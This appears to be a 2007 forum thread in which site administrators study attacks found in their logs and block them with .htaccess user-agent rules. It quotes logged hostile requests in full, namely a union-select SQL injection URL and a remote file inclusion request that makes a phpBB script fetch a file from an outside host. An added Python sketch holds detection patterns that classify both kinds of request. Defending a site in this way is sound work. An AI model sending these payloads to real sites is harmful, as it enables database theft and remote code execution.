
Re: Security Logs with Hacker IP's

Posted: Sat Aug 18, 2007 6:25 pm
Author: CaNNon
We still get lots of attacks, but it generates a nice log in the error_log for tracking/reporting purposes...


Using rewrite, it kills the tool that is hitting me in about 85% of the attacks. This makes the log smaller, so if you try it, set it up to process the rewrite first, then the URLs; it could help speed things up a bit (this file is processed on every request, I believe) and make a little less work with the logs for you.

Just a thought.

Re: Security Logs with Hacker IP's

Posted: Wed Nov 28, 2007 8:46 pm
Author: Omni-Lee
Checking the log file I found this little number:

Code:
/forum/links.php?t=search&search_keywords=asd&start=1,1+and+1=2+union+select+0x2D4578372D31,0x2D4578372D32,0x2D4578372D33,0x2D4578372D34,0x2D4578372D35,0x2D4578372D36,0x2D4578372D37,0x2D4578372D38,0x2D4578372D39,0x2D4578372D3130,0x2D4578372D3131,0x2D4578372D3132,0x2D4578372D3133,0x2D4578372D3134,0x2D4578372D3135,0x2D4578372D3136,0x2D4578372D3137,0x2D4578372D3138,0x2D4578372D3139,0x2D4578372D3230,0x2D4578372D3231,0x2D4578372D3232,0x2D4578372D3233,0x2D4578372D3234,0x2D4578372D3235,0x2D4578372D3236,0x2D4578372D3237,0x2D4578372D3238,0x2D4578372D3239,0x2D4578372D3330,0x2D4578372D3331,0x2D4578372D3332,0x2D4578372D3333,0x2D4578372D3334,0x2D4578372D3335,0x2D4578372D3336,0x2D4578372D3337,0x2D4578372D3338,0x2D4578372D3339,0x2D4578372D3430,0x2D4578372D3431,0x2D4578372D3432,0x2D4578372D3433,0x2D4578372D3434,0x2D4578372D3435,0x2D4578372D3436,0x2D4578372D3437,0x2D4578372D3438,0x2D4578372D3439,0x2D4578372D3530/*


What the heck is it?

Btw, what is that Rewrite in .htaccess? Can it be used for attacks like what I posted above?

Re: Security Logs with Hacker IP's

Posted: Thu Nov 29, 2007 7:07 am
Author: CaNNon
Post the full attack like this:

forum/viewforum.php?f=4&mark=topics&lofi=1//includes/functions_portal.php?phpbb_root_path=http://terroristirc.by.ru/rootlab.jpg?
libwww-perl/5.79 61.19.188.2 15 Jul 2007 11:04 pm

and if I have a .htaccess rule I'll post it; the attack type is in that URL: "union+select".
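
As an added example (not part of any post in this thread): a Python log-triage sketch that labels the two request types quoted above and decodes the 0x... literals from the union+select entry, which turn out to be numbered marker strings (-Ex7-1 through -Ex7-50 in the logged request). The sample lines are constructed from the thread's entries, with the hex list shortened and the remote host replaced by a placeholder; all function and label names are hypothetical.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed samples modelled on the requests quoted in the thread
# (hex list shortened to three values; attacker.example is a placeholder).
SAMPLE_REQUESTS = [
    "/forum/links.php?t=search&search_keywords=asd&start=1,1+and+1=2+union+select+"
    "0x2D4578372D31,0x2D4578372D32,0x2D4578372D33/*",
    "/forum/viewforum.php?f=4&mark=topics&lofi=1//includes/functions_portal.php"
    "?phpbb_root_path=http://attacker.example/rootlab.jpg?",
    "/forum/viewtopic.php?t=12&start=15",
]

# "union select" / "union all select" once '+' and %xx have been decoded.
UNION_SELECT = re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)
# MySQL-style hex string literal: 0x followed by whole bytes.
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)
# A parameter whose value is a remote URL. This also matches legitimate
# redirect-style parameters, so treat it as a lead to review, not a verdict.
REMOTE_INCLUDE = re.compile(r"=\s*(?:https?|ftp)://", re.I)


def decode_hex_literals(text):
    """Return the strings encoded by every 0x... literal found in text."""
    return [bytes.fromhex(h).decode("latin-1") for h in HEX_LITERAL.findall(text)]


def classify(request_uri):
    """Label one logged request URI and decode any hex literals in its query."""
    query = unquote_plus(urlsplit(request_uri).query)
    labels = []
    if UNION_SELECT.search(query):
        labels.append("sqli-union-select")
    if REMOTE_INCLUDE.search(query):
        labels.append("remote-file-include")
    return {"labels": labels, "markers": decode_hex_literals(query)}


def triage(requests):
    """Classify every request; returns a list of (uri, result) pairs."""
    return [(uri, classify(uri)) for uri in requests]


if __name__ == "__main__":
    for uri, result in triage(SAMPLE_REQUESTS):
        print(result["labels"] or ["clean"], result["markers"], uri[:60])
```

The decoded markers show why the entry is so long: each selected column carries its own numbered tag, so any tag echoed back in the page reveals which column position is displayed.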

Re: Security Logs with Hacker IP's

Posted: Thu Nov 29, 2007 10:29 am
Author: Omni-Lee
I tried the RewriteCond code you supplied and I get 403 Access Denied. It was a direct copy and paste.

*Edit*: I found the problem, the [OR] can only be used when there is going to be another command (possibly of a similar type).

Code:
RewriteEngine On
# testing user agent blocking
RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]
RewriteCond %{HTTP_USER_AGENT} ai_archiver
# end test
RewriteRule ^.* - [F,L]

Re: Security Logs with Hacker IP's

Posted: Thu Nov 29, 2007 11:53 am
Author: CaNNon
That's correct, did you check to see if that block will stop that?

Re: Security Logs with Hacker IP's

Posted: Thu Nov 29, 2007 2:35 pm
Author: Omni-Lee
I've been watching and the logs have been clean. What's totally nuts is I actually want to see an entry now, just so I can block it. Thanks for that bit of code. With the error, inadvertent as it was, I researched .htaccess commands and found ways to further secure my site, specifically hiding the .htaccess file from external requests. I never knew all the good things that could be done in .htaccess; it is a pretty powerful file.